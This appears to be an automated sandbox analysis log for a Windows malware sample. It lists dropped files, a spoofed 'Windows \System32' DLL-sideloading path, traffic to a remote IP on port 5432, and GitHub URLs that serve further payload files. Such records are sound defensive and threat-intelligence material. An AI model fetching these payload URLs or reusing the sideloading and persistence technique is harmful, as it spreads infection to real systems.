Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3450709409.00007FFD93F8B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452174968.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564379487.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: ucrtbased.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: PrintUI.pdb source: usvcinsta64.exe, 0000000C.00000003.2444120112.000001EE7B67E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.2444821279.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: PrintUI.pdbGCTL source: usvcinsta64.exe, 0000000C.00000003.2444120112.000001EE7B67E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.2444821279.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FF71FA20144 FindClose,FindFirstFileExW,GetLastError
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FF71FA33764 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FF71FA201B8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\System32\crypti.exe Code function: 76_2_00007FF60CCCD568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: C:\Windows\System32\crypti.exe Code function: 83_2_00007FF7D6EFD568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose
Source: global traffic TCP traffic: 192.168.2.6:49844 -> 188.116.21.204:5432
Source: Joe Sandbox View IP Address: 34.117.59.81
Source: Joe Sandbox View IP Address: 20.233.83.145
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: unknown DNS query: name: ipinfo.io
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\svchost.exe Code function: 42_2_00007FFDA3641C20 BIO_ADDR_clear,BIO_ADDR_clear,ERR_set_mark,BIO_recvmmsg,ERR_peek_last_error,BIO_err_is_non_fatal,ERR_pop_to_mark,ERR_clear_last_mark,ERR_clear_last_mark
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: runvrs.com
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: svchost.exe, 00000013.00000002.3450915324.000001F6D3611000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000013.00000003.2384375707.000001F6D3370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3447936117.0000000064953000.00000008.00000001.01000000.00000012.sdmp String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: svchost.exe, 00000013.00000002.3449448298.000001F6CDEB0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.mi
Source: console_zero.exe, 0000002D.00000002.2563177329.000001D7ED32C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTC
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, console_zero.exe, 0000002D.00000000.2532139890.00007FF71FA3C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000002D.00000002.2563922460.00007FF71FA3C000.00000002.00000001.01000000.00000014.sdmp String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3448830797.00000000682A4000.00000008.00000001.01000000.00000011.sdmp String found in binary or memory: http://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: http://www.zlib.net/
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452208317.00007FFDA5477000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564413372.00007FFDA5477000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.zlib.net/D
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564285158.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/V
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: svchost.exe, console_zero.exe String found in binary or memory: https://curl.se/docs/copyright.html
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564285158.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: svchost.exe, 00000013.00000003.2384375707.000001F6D33CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000013.00000003.2384375707.000001F6D3370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: svchost.exe, 0000002A.00000002.3449969880.00000266EA90F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.dat
Source: svchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.dat
Source: svchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.dat
Source: svchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.dat
Source: svchost.exe, 0000002A.00000002.3450200488.00000266EA924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/un2/uusb.dat
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: https://ipinfo.io/json
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp String found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exe String found in binary or memory: https://www.openssl.org/
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp, svchost.exe, 0000002A.00000002.3450978095.00007FFD9408E000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: https://www.openssl.org/H
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49886 -> 443
Source: C:\Windows\System32\console_zero.exe Code function: 45_2_00007FFDA3741180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext
Source: cmd.exe Process created: 48
Source: C:\Windows\System32\svchost.exe Code function: 42_2_00007FFDA36F59C0: GetFileAttributesA,GetLastError,_errno,CreateFileA,GetLastError,DeviceIoControl,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,_errno,CloseHandle,WideCharToMultiByte,_errno,isalpha,memcpy
Source: C:\Users\user\Desktop\pyld611114.exe File created: C:\Windows\System32\usvcinsta64.exe
Source: C:\Windows\System32\usvcinsta64.exe File created: C:\Windows \System32\printui.exe
Source: C:\Windows\System32\usvcinsta64.exe File created: C:\Windows \System32\printui.dll
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\cmd.exe File created: C:\Windows
Source: C:\Windows\System32\cmd.exe File created: C:\Windows \System32
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\winsvcf\winlogsvc
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\x816796.dat
Source: C:\Windows\System32\svchost.exe File created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exe File deleted: C:\Windows\System32\crypti.exe
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA1DC1045_2_00007FF71FA1DC10
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA123F045_2_00007FF71FA123F0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA10AB045_2_00007FF71FA10AB0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA352A045_2_00007FF71FA352A0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA0630045_2_00007FF71FA06300
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA05A7045_2_00007FF71FA05A70
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA3226045_2_00007FF71FA32260
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA201B845_2_00007FF71FA201B8
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA291DC45_2_00007FF71FA291DC
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA2A93445_2_00007FF71FA2A934
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377F43045_2_00007FFDA377F430
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374238045_2_00007FFDA3742380
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA375E3C045_2_00007FFDA375E3C0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374118045_2_00007FFDA3741180
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378318045_2_00007FFDA3783180
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37401D045_2_00007FFDA37401D0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378278045_2_00007FFDA3782780
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377B79045_2_00007FFDA377B790
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA373D66045_2_00007FFDA373D660
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA376666045_2_00007FFDA3766660
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37676B045_2_00007FFDA37676B0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374261045_2_00007FFDA3742610
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374C62045_2_00007FFDA374C620
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378857045_2_00007FFDA3788570
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37784F045_2_00007FFDA37784F0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378453045_2_00007FFDA3784530
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377B47045_2_00007FFDA377B470
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37684C045_2_00007FFDA37684C0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3766C3E45_2_00007FFDA3766C3E
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3732B2045_2_00007FFDA3732B20
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA378BA8645_2_00007FFDA378BA86
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA376BA8045_2_00007FFDA376BA80
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3751AC045_2_00007FFDA3751AC0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3737EE045_2_00007FFDA3737EE0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3768E6045_2_00007FFDA3768E60
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3775D0045_2_00007FFDA3775D00
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCD3C1876_2_00007FF60CCD3C18
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8718076_2_00007FF60CC87180
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCEDB476_2_00007FF60CCCEDB4
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC94DA076_2_00007FF60CC94DA0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA7EC076_2_00007FF60CCA7EC0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC4E7C76_2_00007FF60CCC4E7C
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCBEE4C76_2_00007FF60CCBEE4C
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA8FD876_2_00007FF60CCA8FD8
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC00F876_2_00007FF60CCC00F8
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCBF05076_2_00007FF60CCBF050
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCCA0076_2_00007FF60CCCCA00
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA898076_2_00007FF60CCA8980
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC98AA076_2_00007FF60CC98AA0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC9ABD076_2_00007FF60CC9ABD0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8CBC076_2_00007FF60CC8CBC0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCBBF076_2_00007FF60CCCBBF0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC3B7876_2_00007FF60CCC3B78
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA8B9676_2_00007FF60CCA8B96
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCB2B5876_2_00007FF60CCB2B58
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCAC8476_2_00007FF60CCCAC84
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC9A5C076_2_00007FF60CC9A5C0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCD56876_2_00007FF60CCCD568
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8671076_2_00007FF60CC86710
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCD36C076_2_00007FF60CCD36C0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC167C76_2_00007FF60CCC167C
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8582076_2_00007FF60CC85820
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCAA7F076_2_00007FF60CCAA7F0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCA7EC76_2_00007FF60CCCA7EC
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA879076_2_00007FF60CCA8790
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCC11F876_2_00007FF60CCC11F8
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC941E076_2_00007FF60CC941E0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8619076_2_00007FF60CC86190
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCD030076_2_00007FF60CCD0300
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCB2FC76_2_00007FF60CCCB2FC
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8C2B076_2_00007FF60CC8C2B0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC8D2B076_2_00007FF60CC8D2B0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA825076_2_00007FF60CCA8250
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCBF25476_2_00007FF60CCBF254
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCA925876_2_00007FF60CCA9258
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CC9A3E076_2_00007FF60CC9A3E0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EB718083_2_00007FF7D6EB7180
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6F03C1883_2_00007FF7D6F03C18
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EDA7F083_2_00007FF7D6EDA7F0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFA7EC83_2_00007FF7D6EFA7EC
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED879083_2_00007FF7D6ED8790
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EB582083_2_00007FF7D6EB5820
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ECA5C083_2_00007FF7D6ECA5C0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFD56883_2_00007FF7D6EFD568
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EB671083_2_00007FF7D6EB6710
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6F036C083_2_00007FF7D6F036C0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF167C83_2_00007FF7D6EF167C
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ECA3E083_2_00007FF7D6ECA3E0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF11F883_2_00007FF7D6EF11F8
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EC41E083_2_00007FF7D6EC41E0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EB619083_2_00007FF7D6EB6190
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6F0030083_2_00007FF7D6F00300
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFB2FC83_2_00007FF7D6EFB2FC
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EBC2B083_2_00007FF7D6EBC2B0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EBD2B083_2_00007FF7D6EBD2B0
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED925883_2_00007FF7D6ED9258
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EEF25483_2_00007FF7D6EEF254
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED825083_2_00007FF7D6ED8250
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6ED8FD883_2_00007FF7D6ED8FD8
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EF00F883_2_00007FF7D6EF00F8
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EEF05083_2_00007FF7D6EEF050
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFEDB483_2_00007FF7D6EFEDB4
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EC4DA083_2_00007FF7D6EC4DA0
